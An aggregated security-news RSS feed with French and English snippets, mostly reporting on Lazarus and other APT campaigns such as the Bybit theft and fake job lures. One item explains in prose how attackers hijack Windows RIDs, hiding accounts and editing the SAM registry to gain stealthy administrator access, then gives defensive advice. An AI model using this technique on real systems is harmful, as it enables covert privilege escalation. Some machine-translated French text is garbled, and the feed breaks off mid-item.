This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-10T22:57:36+00:00 www.secnews.physaphae.fr SecureMac - Security focused on MAC également connu sous le nom de heur: trojan-downloader.osx.lazarus.gen Type: Menace hybride Plateforme: Mac OS 9 Dernière mise à jour: 28/11/24 7:01 AM Niveau de menace: High Description Ce malware installe une porte dérobée pour l'exécution de la commande distante et abuse du fichier de configuration Zshenv pour la persistance, en contournant les mécanismes de sécurité de MacOS comme les notifications des éléments de connexion. BLUENOROFF REPLATION DE LA MONAGE MacScan peut détecter et supprimer la menace hybride Bluenoroff de votre système, ainsi que de protéger d'autres menaces de sécurité et de confidentialité. Un essai de 30 jours est disponible pour scanner votre système pour cette menace. Télécharger macScan

---

>also known as HEUR:Trojan-Downloader.OSX.Lazarus.gen Type: Hybrid Threat Platform: Mac OS 9 Last updated: 11/28/24 7:01 am Threat Level: High Description This malware installs a backdoor for remote command execution and abuses the zshenv configuration file for persistence, bypassing macOS’s security mechanisms like Login Items notifications. BlueNoroff Threat Removal MacScan can detect and remove BlueNoroff Hybrid Threat from your system, as well as provide protection against other security and privacy threats. A 30-day trial is available to scan your system for this threat. Download MacScan ]]> 2025-05-07T10:17:41+00:00 https://www.securemac.com/definitions/BlueNoroff www.secnews.physaphae.fr/article.php?IdArticle=8672872 False Malware,Threat APT 38 2.0000000000000000 GB Hacker - Blog de reverseur L'équipe SEQRITE LABS APT a découvert une cyber campagne sophistiquée par la tribu transparente liée au Pakistan (APT36) ciblant le gouvernement indien et le personnel de défense. Cette opération, centrée sur la récente attaque terroriste de Pahalgam le 22 avril 2025, exploite des thèmes chargés émotionnellement pour distribuer des documents de phishing et déployer des charges utiles malveillantes. Exploitation des tensions géopolitiques pour le cyber-espionnage le […]

---

>The Seqrite Labs APT team has uncovered a sophisticated cyber campaign by the Pakistan-linked Transparent Tribe (APT36) targeting Indian Government and Defense personnel. This operation, centered around the recent Pahalgam terror attack on April 22, 2025, leverages emotionally charged themes to distribute phishing documents and deploy malicious payloads. Exploiting Geopolitical Tensions for Cyber Espionage The […] ]]> 2025-05-05T15:05:25+00:00 https://gbhackers.com/hackers-use-pahalgam-attack-themed-decoys/ www.secnews.physaphae.fr/article.php?IdArticle=8671869 False None APT 36 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Résumé exécutif GoogleThreat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities). We divided the reviewed vulnerabilities into two main categories: end-user platforms and products (e.g., mobile devices, operating systems, and browsers) and enterprise-focused technologies, such as security software and appliances.  Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets. At the same time, commercial surveillance vendors (CSVs) appear to be increasing their operational security practices, potentially leading to decreased attribution and detection. We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies. While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts. Scope  This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024. We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products. The following content leverages original research conducted by GTIG, combined with breach investigation findings and reporting from reliable open sources, though we cannot independently confirm the reports of every source. Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations. The numbers presented here reflect our best understanding of current data. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation. aside_block Key Takeaways Zero-day exploitation continues to grow gradually. The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged ]]> 2025-04-29T05:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends/ www.secnews.physaphae.fr/article.php?IdArticle=8669387 False Malware,Tool,Vulnerability,Threat,Patching,Mobile,Prediction,Cloud,Commercial APT 37 2.0000000000000000 GB Hacker - Blog de reverseur Les analystes de menaces de push silencieuses ont découvert une nouvelle campagne de cyberattaque effrayante orchestrée par le groupe de menace persistante avancée (APT) nord-coréen connue sous le nom d'interview contagieuse, également appelée célèbre Chollima, un sous-groupe du célèbre groupe Lazare. Cette entité parrainée par l'État a été impliquée dans de nombreux efforts de cyber-espionnage sophistiqués ciblant les industries mondiales, avec un […] particulier […]

---

>Silent Push Threat Analysts have uncovered a chilling new cyberattack campaign orchestrated by the North Korean Advanced Persistent Threat (APT) group known as Contagious Interview, also referred to as Famous Chollima, a subgroup of the notorious Lazarus group. This state-sponsored entity has been implicated in numerous sophisticated cyber-espionage efforts targeting global industries, with a particular […] ]]> 2025-04-25T17:34:28+00:00 https://gbhackers.com/north-korean-apt-hackers-pose-as-companies/ www.secnews.physaphae.fr/article.php?IdArticle=8667769 False Malware,Threat APT 38 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole. The activity targeted South Korea\'s software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. The earliest evidence of compromise was first detected in]]> 2025-04-24T19:41:00+00:00 https://thehackernews.com/2025/04/lazarus-hits-6-south-korean-firms-via.html www.secnews.physaphae.fr/article.php?IdArticle=8667217 False Malware,Vulnerability,Threat APT 38 3.0000000000000000 GB Hacker - Blog de reverseur Une récente campagne de cyber-espionnage par le célèbre groupe de menaces persistantes (APT) de Lazarus avancée (APT), suivie comme «Opération Synchole», a compromis au moins six organisations sud-coréennes à travers les logiciels, l'informatique, le financier, les semi-conducteurs et les secteurs de télécommunications depuis novembre 2024. […]

---

>A recent cyber espionage campaign by the notorious Lazarus Advanced Persistent Threat (APT) group, tracked as “Operation SyncHole,” has compromised at least six South Korean organizations across software, IT, financial, semiconductor, and telecommunications sectors since November 2024. According to detailed research, the attackers employed a combination of watering hole attacks and exploited vulnerabilities in widely […] ]]> 2025-04-24T17:07:50+00:00 https://gbhackers.com/lazarus-apt-targets-organizations/ www.secnews.physaphae.fr/article.php?IdArticle=8667290 False Vulnerability,Threat APT 38 3.0000000000000000 Bleeping Computer - Magazine Américain In a recent espionage campaign, the infamous North Korean threat group Lazarus targeted multiple organizations in the software, IT, finance, and telecommunications sectors in South Korea. [...]]]> 2025-04-24T15:13:32+00:00 https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-six-companies-in-watering-hole-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8667329 False Threat APT 38 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2025-04-24T09:27:52+00:00 https://www.globalsecuritymag.fr/kaspersky-decouvre-de-nouvelles-cyberattaques-menees-par-lazarus-visant-les.html www.secnews.physaphae.fr/article.php?IdArticle=8667081 False None APT 38 3.0000000000000000 Kaspersky - Kaspersky Research blog Kaspersky GReAT experts uncovered a new campaign by Lazarus APT that exploits vulnerabilities in South Korean software products and uses a watering hole approach.]]> 2025-04-24T05:00:04+00:00 https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/ www.secnews.physaphae.fr/article.php?IdArticle=8666967 False Vulnerability APT 38 3.0000000000000000 GB Hacker - Blog de reverseur Les chercheurs ont découvert les premiers indicateurs d'infrastructures malveillantes liées à l'APT34, également connu sous le nom de Oilrig, un groupe de menaces iranien présumé connu pour cibler des secteurs comme l'éducation, le gouvernement, l'énergie, les télécommunications et les ONG. Entre novembre 2024 et avril 2025, une série de domaines et de serveurs ont été suivis, imitant une organisation académique en Irak (Biam-Iraq [.] Org) et Fictieuse Basé au Royaume-Uni […]

---

>Researchers have uncovered early indicators of malicious infrastructure linked to APT34, also known as OilRig, a suspected Iranian threat group notorious for targeting sectors like education, government, energy, telecom, and NGOs. Between November 2024 and April 2025, a series of domains and servers were tracked, impersonating an academic organization in Iraq (biam-iraq[.]org) and fictitious UK-based […] ]]> 2025-04-23T11:02:35+00:00 https://gbhackers.com/apt34-hackers-use-port-8080-for-fake-404-responses/ www.secnews.physaphae.fr/article.php?IdArticle=8666596 False Threat APT 34 3.0000000000000000 Schneier on Security - Chercheur Cryptologue Américain d'abord Time Dans l'océan. Ce n'est qu'un juvénile: un pied de long. Comme d'habitude, vous pouvez également utiliser ce post de calmar pour parler des histoires de sécurité dans les nouvelles que je n'ai pas couvertes.

---

A live colossal squid was filmed for the first time in the ocean. It’s only a juvenile: a foot long. As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.]]> 2025-04-18T21:02:33+00:00 https://www.schneier.com/blog/archives/2025/04/friday-squid-blogging-live-colossal-squid-filmed.html www.secnews.physaphae.fr/article.php?IdArticle=8664628 False None APT 32 2.0000000000000000 The State of Security - Magazine Américain Advanced Persistent Threat (APT) groups are not a new scourge. These sophisticated, state-sponsored cyber adversaries, with deep pockets and highly advanced technical skills, conduct prolonged and targeted attacks to infiltrate networks, exfiltrate sensitive data, and disrupt critical infrastructure. The stakes have never been higher, so in this blog, we\'ll look at some of the most notorious APT actors, their unique Tactics, Techniques, and Procedures (TTPs), and attacks attributed to them, and offer a few tips on how to defend against them. The Lazarus Group Originating from North Korea, the...]]> 2025-04-16T02:46:50+00:00 https://www.tripwire.com/state-of-security/apt-rogues-gallery-worlds-most-dangerous-cyber-adversaries www.secnews.physaphae.fr/article.php?IdArticle=8663404 False Threat,Technical APT 38 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by]]> 2025-04-03T17:52:00+00:00 https://thehackernews.com/2025/04/lazarus-group-targets-job-seekers-with.html www.secnews.physaphae.fr/article.php?IdArticle=8660049 False Malware,Threat APT 38 3.0000000000000000 SecurityWeek - Security News Les pirates de Lazarus de la Corée du Nord utilisent la technique ClickFix pour le déploiement de logiciels malveillants dans de nouvelles attaques ciblant l'écosystème de crypto-monnaie.

---

>North Korea\'s Lazarus hackers are using the ClickFix technique for malware deployment in fresh attacks targeting the cryptocurrency ecosystem. ]]> 2025-04-02T10:45:54+00:00 https://www.securityweek.com/lazarus-uses-clickfix-tactics-in-fake-cryptocurrency-job-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8659799 False Malware APT 38 3.0000000000000000 Dark Reading - Informationweek Branch A continuation of the North Korean nation-state threat\'s campaign against employment seekers uses the social engineering attack to target CeFi organizations with the GolangGhost backdoor.]]> 2025-04-01T13:21:21+00:00 https://www.darkreading.com/cyberattacks-data-breaches/lazarus-apt-clickfix-bandwagon-attacks www.secnews.physaphae.fr/article.php?IdArticle=8659619 False Threat APT 38 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine New “ClickFake Interview” campaign attributed to the Lazarus Group targets crypto professionals with fake job offers]]> 2025-03-31T15:00:00+00:00 https://www.infosecurity-magazine.com/news/clickfake-interview-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=8659410 False None APT 38 3.0000000000000000 Bleeping Computer - Magazine Américain The notorious North Korean Lazarus hacking group has reportedly adopted \'ClickFix\' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). [...]]]> 2025-03-31T11:56:54+00:00 https://www.bleepingcomputer.com/news/security/north-korean-hackers-adopt-clickfix-attacks-to-target-crypto-firms/ www.secnews.physaphae.fr/article.php?IdArticle=8659416 False Malware APT 38 3.0000000000000000 Schneier on Security - Chercheur Cryptologue Américain squid welwolf ." Comme d'habitude, vous pouvez également utiliser ce post de calmar pour parler des histoires de sécurité dans les nouvelles que je n'ai pas couvertes.

---

In another rare squid/cybersecurity intersection, APT37 is also known as “Squid Werewolf.” As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.]]> 2025-03-28T21:04:42+00:00 https://www.schneier.com/blog/archives/2025/03/friday-squid-blogging-squid-werewolf-hacking-group.html www.secnews.physaphae.fr/article.php?IdArticle=8658955 False None APT 37 3.0000000000000000 Dark Reading - Informationweek Branch The Islamic Republic is keeping its enemies close and its friends closer, with espionage attacks aimed at nearby neighbors.]]> 2025-03-28T06:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/irans-mois-linked-apt34-spies-allies-iraq-yemen www.secnews.physaphae.fr/article.php?IdArticle=8658775 False None APT 34 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India\'s public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as]]> 2025-03-27T18:01:00+00:00 https://thehackernews.com/2025/03/apt36-spoofs-india-post-website-to.html www.secnews.physaphae.fr/article.php?IdArticle=8658566 False Malware,Threat,Mobile APT 36 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The U.S. Treasury Department has announced that it\'s removing sanctions against Tornado Cash, a cryptocurrency mixer service that has been accused of aiding the North Korea-linked Lazarus Group to launder their ill-gotten proceeds. "Based on the Administration\'s review of the novel legal and policy issues raised by use of financial sanctions against financial and commercial activity occurring]]> 2025-03-22T13:02:00+00:00 https://thehackernews.com/2025/03/us-treasury-lifts-tornado-cash.html www.secnews.physaphae.fr/article.php?IdArticle=8657361 False Commercial APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korea-linked threat actor known as ScarCruft is said to have been behind a never-before-seen Android surveillance tool named KoSpy targeting Korean and English-speaking users. Lookout, which shared details of the malware campaign, said the earliest versions date back to March 2022. The most recent samples were flagged in March 2024. It\'s not clear how successful these efforts were. "]]> 2025-03-13T19:53:00+00:00 https://thehackernews.com/2025/03/north-koreas-scarcruft-deploys-kospy.html www.secnews.physaphae.fr/article.php?IdArticle=8655561 False Malware,Tool,Threat,Mobile APT 37 2.0000000000000000 SecurityWeek - Security News L'APT37 lié à la Corée du Nord a été observé ciblant les utilisateurs d'Android avec des logiciels espions distribués via Google Play.

---

>The North Korea-linked APT37 has been observed targeting Android users with spyware distributed via Google Play. ]]> 2025-03-13T12:58:55+00:00 https://www.securityweek.com/north-korean-hackers-distributed-android-spyware-via-google-play/ www.secnews.physaphae.fr/article.php?IdArticle=8655524 False Mobile APT 37 2.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Les chercheurs de socket ont déclaré que les packages de logiciels malveillants avaient été téléchargés collectivement plus de 330 fois. GitHub a supprimé tous les packages malveillants mercredi.

---

>Socket researchers said the malware-ridden packages were collectively downloaded over 330 times. GitHub removed all of the malicious packages Wednesday. ]]> 2025-03-12T22:31:17+00:00 https://cyberscoop.com/lazarus-group-north-korea-malicious-npm-packages-socket/ www.secnews.physaphae.fr/article.php?IdArticle=8655397 False None APT 38 2.0000000000000000 Recorded Future - FLux Recorded Future A North Korean nation-state group tracked as APT37 or ScarCruft placed infected utilities in Android app stores as part of an espionage campaign, according to researchers at Lookout.]]> 2025-03-12T15:11:46+00:00 https://therecord.media/north-korea-malware-android-apps-kospy-apt37-scarcruft www.secnews.physaphae.fr/article.php?IdArticle=8655327 False Mobile APT 37 2.0000000000000000 HackRead - Chercher Cyber Lazarus Group targets developers with malicious npm packages, stealing credentials, crypto, and installing backdoor. Stay alert to protect your projects.]]> 2025-03-12T00:15:21+00:00 https://hackread.com/lazarus-group-backdoor-fake-npm-packages-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8655158 False None APT 38 2.0000000000000000 BBC - BBC News - Technology Hackers from the infamous Lazarus Group are in a cat-and-mouse game to launder their stolen funds from the ByBit heist.]]> 2025-03-10T01:11:47+00:00 https://www.bbc.com/news/articles/c2kgndwwd7lo www.secnews.physaphae.fr/article.php?IdArticle=8654807 False Hack APT 38 3.0000000000000000 Detection Engineering - Blog Sécu Let\'s take out Lazarus.]]> 2025-03-05T13:03:46+00:00 https://www.detectionengineering.net/p/det-eng-weekly-105-im-assembling www.secnews.physaphae.fr/article.php?IdArticle=8653814 False None APT 38 2.0000000000000000 TechRepublic - Security News US North Korea\'s Lazarus Group pulled off the $1.5B Bybit hack, making it the biggest crypto heist ever. Here\'s how they did it-and what\'s next.]]> 2025-03-03T14:05:24+00:00 https://www.techrepublic.com/article/bybit-hack-north-korea-crypto-heist-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8653050 False Hack APT 38 3.0000000000000000 Recorded Future - FLux Recorded Future The bureau attributed the $1.5 billion hack to the North Korean threat actor known as TraderTraitor, or Lazarus, following similar assessments by cybersecurity researchers.]]> 2025-02-27T15:28:39+00:00 https://therecord.media/fbi-bybit-laundering-crypto-warning www.secnews.physaphae.fr/article.php?IdArticle=8651661 False Hack,Threat APT 38 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The U.S. Federal Bureau of Investigation (FBI) formally linked the record-breaking $1.5 billion Bybit hack to North Korean threat actors, as the company\'s CEO Ben Zhou declared a "war against Lazarus." The agency said the Democratic People\'s Republic of Korea (North Korea) was responsible for the theft of the virtual assets from the cryptocurrency exchange, attributing it to a specific cluster]]> 2025-02-27T12:45:00+00:00 https://thehackernews.com/2025/02/bybit-hack-traced-to-safewallet-supply.html www.secnews.physaphae.fr/article.php?IdArticle=8651510 False Hack,Threat APT 38 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine FBI confirms North Korea\'s Lazarus Group responsible for Bybit crypto heist]]> 2025-02-27T09:35:00+00:00 https://www.infosecurity-magazine.com/news/fbi-confirms-north-koreas-lazarus/ www.secnews.physaphae.fr/article.php?IdArticle=8651545 False None APT 38 3.0000000000000000 The Register - Site journalistique Anglais

---

Up to $140M in bounty rewards for return of Ethereum allegedly pilfered by hermit nation Cryptocurrency exchange Bybit, just days after suspected North Korean operatives stole $1.5 billion in Ethereum from it, has launched a bounty program to help recover its funds.… ]]> 2025-02-26T23:49:20+00:00 https://go.theregister.com/feed/www.theregister.com/2025/02/26/bybit_lazarus_bounty/ www.secnews.physaphae.fr/article.php?IdArticle=8651414 False None APT 38,APT 37 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Le montant volé la semaine dernière dépasse ce que le groupe a pu voler tout en 2024.

---

>The amount stolen last week surpasses what the group was able to steal in all of 2024. ]]> 2025-02-25T18:49:07+00:00 https://cyberscoop.com/bybit-lazarus-group-north-korea-ethereum/ www.secnews.physaphae.fr/article.php?IdArticle=8650952 False None APT 38 4.0000000000000000 Dark Reading - Informationweek Branch Cyberattackers believed to be affiliated with the state-sponsored threat group pulled off the largest crypto heist reported to date, stealing $1.5 billion from exchange Bybit. It was carried out by interfering with a routine transfer between wallets.]]> 2025-02-25T10:16:39+00:00 https://www.darkreading.com/cyberattacks-data-breaches/north-korea-lazarus-crypto-heist www.secnews.physaphae.fr/article.php?IdArticle=8650949 False Threat APT 38 4.0000000000000000 Recorded Future - FLux Recorded Future Cybersecurity researchers say North Korean hackers are behind the largest cryptocurrency heist in history and are actively laundering the more than $1.4 billion in cryptocurrency stolen from the Bybit exchange on Friday.]]> 2025-02-24T18:28:46+00:00 https://therecord.media/lazarus-hackers-behind-bybit-crypto-heist www.secnews.physaphae.fr/article.php?IdArticle=8650592 False None APT 38 4.0000000000000000 Recorded Future - FLux Recorded Future The latest package of EU sanctions related to Russia\'s invasion of Ukraine included the leader of the North Korean intelligence agency known for backing the Lazarus group and other high-profile hacking operations.]]> 2025-02-24T18:25:49+00:00 https://therecord.media/eu-sanctions-north-korea-ukraine-war-lazarus-group www.secnews.physaphae.fr/article.php?IdArticle=8650593 False None APT 38 3.0000000000000000 HackRead - Chercher Cyber Investigators link the $1.4B Bybit hack to North Korea\'s Lazarus Group, exposing a major crypto heist tied to state-backed cybercrime and money laundering.]]> 2025-02-23T20:13:39+00:00 https://hackread.com/investigators-link-bybit-hack-north-korea-lazarus-group/ www.secnews.physaphae.fr/article.php?IdArticle=8650283 False Hack APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers. The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that\'s associated with a profile named "]]> 2025-02-14T23:58:00+00:00 https://thehackernews.com/2025/02/lazarus-group-deploys-marstech1.html www.secnews.physaphae.fr/article.php?IdArticle=8648530 False Malware,Threat APT 38 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine SecurityScorecard has uncovered a sophisticated campaign linked to North Korea\'s Lazarus Group, distributing crypto-stealing malware]]> 2025-02-13T10:15:00+00:00 https://www.infosecurity-magazine.com/news/north-korea-crypto-devs-npm/ www.secnews.physaphae.fr/article.php?IdArticle=8648337 False Malware APT 38 3.0000000000000000 Mandiant - Blog Sécu de Mandiant 2025-02-11T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/ www.secnews.physaphae.fr/article.php?IdArticle=8648141 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 41,APT 38,APT 29,APT 43,APT 44 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine A Bitdefender researcher was targeted by North Korea\'s Lazarus with the lure of a fake job offer]]> 2025-02-06T14:50:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-bitdefender-linkedin-scam/ www.secnews.physaphae.fr/article.php?IdArticle=8647224 False None APT 38 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korea-linked Lazarus Group has been linked to an active campaign that leverages fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malware capable of infecting Windows, macOS, and Linux operating systems. According to cybersecurity company Bitdefender, the scam begins with a message sent on a professional social media network, enticing them with the promise of]]> 2025-02-05T20:25:00+00:00 https://thehackernews.com/2025/02/cross-platform-javascript-stealer.html www.secnews.physaphae.fr/article.php?IdArticle=8647065 False Malware APT 38 3.0000000000000000 The Register - Site journalistique Anglais Stealing crypto is so 2024. Supply-chain attacks leading to data exfil pays off better? North Korea\'s Lazarus Group compromised hundreds of victims across the globe in a massive secret-stealing supply chain attack that was ongoing as of earlier this month, according to security researchers.… ]]> 2025-01-29T23:51:45+00:00 https://go.theregister.com/feed/www.theregister.com/2025/01/29/lazarus_groups_supply_chain_attack/ www.secnews.physaphae.fr/article.php?IdArticle=8644522 False None APT 38 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns. "Each C2 server hosted a web-based administrative platform, built with a React application and a Node.js API," SecurityScorecard\'s]]> 2025-01-29T22:26:00+00:00 https://thehackernews.com/2025/01/lazarus-group-uses-react-based-admin.html www.secnews.physaphae.fr/article.php?IdArticle=8644398 False Threat APT 38 3.0000000000000000 Dark Reading - Informationweek Branch The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang.]]> 2025-01-29T21:39:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/researchers-uncover-lazarus-admin-layer-c2-servers www.secnews.physaphae.fr/article.php?IdArticle=8644483 False Threat APT 38 3.0000000000000000 Techworm - News wrote in a blog post published on Thursday. In Windows, a Relative Identifier (RID) is part of a Security Identifier (SID), which exclusively distinguishes each user and group within a domain. For instance, an administrator account will have a RID value of “500”, “501” for guest accounts, “512” for the domain admins group, and for regular users, the RID will start from the value “of 1000”. In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as an administrator account. As a result, Windows grants administrative privileges to the account. However, to pull this off, attackers need access to the SAM (Security Account Manager) registry, which requires them to already have SYSTEM-level access to the targeted machine for modification. Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt. While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn\'t allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected and doesn\'t persist after a system reboot. To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a “$” character to its username. This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account’s privileges to the administrator level. According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system. The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking. Although SYSTEM access could allow the direct creation of administrator accounts, this method is less conspicuous, making it difficult to detect and prevent. To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder. To reduce the risk of RID hijacking, system administrators should implement proactive measures such as: Use the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes. Prevent unauthorized access to the SAM registry. Restricting the use of tools like PsExec and JuicyPotato. Disabling guest accounts. Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.

---

Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group. “RID Hijacking is ]]> 2025-01-25T20:07:25+00:00 https://www.techworm.net/2025/01/hacker-rid-hijacking-create-admin-accounts-windows.html www.secnews.physaphae.fr/article.php?IdArticle=8642525 False Malware,Tool,Threat APT 38,APT 45 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine SecurityScorecard identified a new campaign in which the North Korean Lazarus group aims to steal source code, secrets and cryptocurrency wallet keys from developer environments]]> 2025-01-17T15:30:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-developers-data-theft/ www.secnews.physaphae.fr/article.php?IdArticle=8638804 False None APT 38 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat]]> 2025-01-15T21:07:00+00:00 https://thehackernews.com/2025/01/lazarus-group-targets-web3-developers.html www.secnews.physaphae.fr/article.php?IdArticle=8637830 False Malware,Threat APT 38 2.0000000000000000 Dark Reading - Informationweek Branch "Operation 99" uses job postings to lure freelance software developers into downloading malicious Git repositories. From there, malware infiltrates developer projects to steal source code, secrets, and cryptocurrency.]]> 2025-01-15T16:02:08+00:00 https://www.darkreading.com/threat-intelligence/north-korea-lazarus-apt-developer-recruitment-attacks www.secnews.physaphae.fr/article.php?IdArticle=8637791 False Malware APT 38 2.0000000000000000 Recorded Future - FLux Recorded Future The governments said North Korea\'s notorious Lazarus Group hackers “continue to demonstrate a pattern of malicious behavior in cyberspace by conducting numerous cybercrime campaigns to steal cryptocurrency and targeting exchanges, digital asset custodians, and individual users.”]]> 2025-01-15T15:47:12+00:00 https://therecord.media/us-japan-south-korea-urge-crypto-industry-of-north-korean-hackers www.secnews.physaphae.fr/article.php?IdArticle=8637788 False None APT 38 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Last week\'s OSINT reporting highlights the persistence and evolution of cyber threats targeting a wide range of sectors, from cryptocurrency exchanges to aerospace and defense industries. The predominant attack vectors include phishing, exploitation of long-standing vulnerabilities, and the use of advanced malware like StealBit, OtterCookie, and VBCloud. Threat actors such as North Korea\'s Lazarus Group and TraderTraitor, as well as botnets like FICORA and CAPSAICIN, continue to refine their tactics, leveraging]]> 2024-12-30T12:02:43+00:00 https://community.riskiq.com/article/2ec56fef www.secnews.physaphae.fr/article.php?IdArticle=8631656 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Iranian nation-state hacking group known as Charming Kitten has been observed deploying a C++ variant of a known malware called BellaCiao. Russian cybersecurity company Kaspersky, which dubbed the new version BellaCPP, said it discovered the artifact as part of a "recent" investigation into a compromised machine in Asia that was also infected with the BellaCiao malware. BellaCiao was first]]> 2024-12-25T15:54:00+00:00 https://thehackernews.com/2024/12/irans-charming-kitten-deploys-bellacpp.html www.secnews.physaphae.fr/article.php?IdArticle=8629826 False Malware APT 35 2.0000000000000000 HackRead - Chercher Cyber KEY SUMMARY POINTS Securelist by Kaspersky has published its latest threat intelligence report focused on the activities of…]]> 2024-12-23T20:06:03+00:00 https://hackread.com/lazarus-group-nuclear-industry-cookieplus-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8629231 False Malware,Threat APT 38 4.0000000000000000 Recorded Future - FLux Recorded Future Researchers at Kaspersky said they found the Lazarus Group using “a complex infection chain that included multiple types of malware, such as a downloader, loader, and backdoor, demonstrating the group\'s evolved delivery and improved persistence methods.”]]> 2024-12-23T19:32:18+00:00 https://therecord.media/lazarus-group-new-tools-kaspersky www.secnews.physaphae.fr/article.php?IdArticle=8629232 False Malware,Tool APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Lazarus Group, an infamous threat actor linked to the Democratic People\'s Republic of Korea 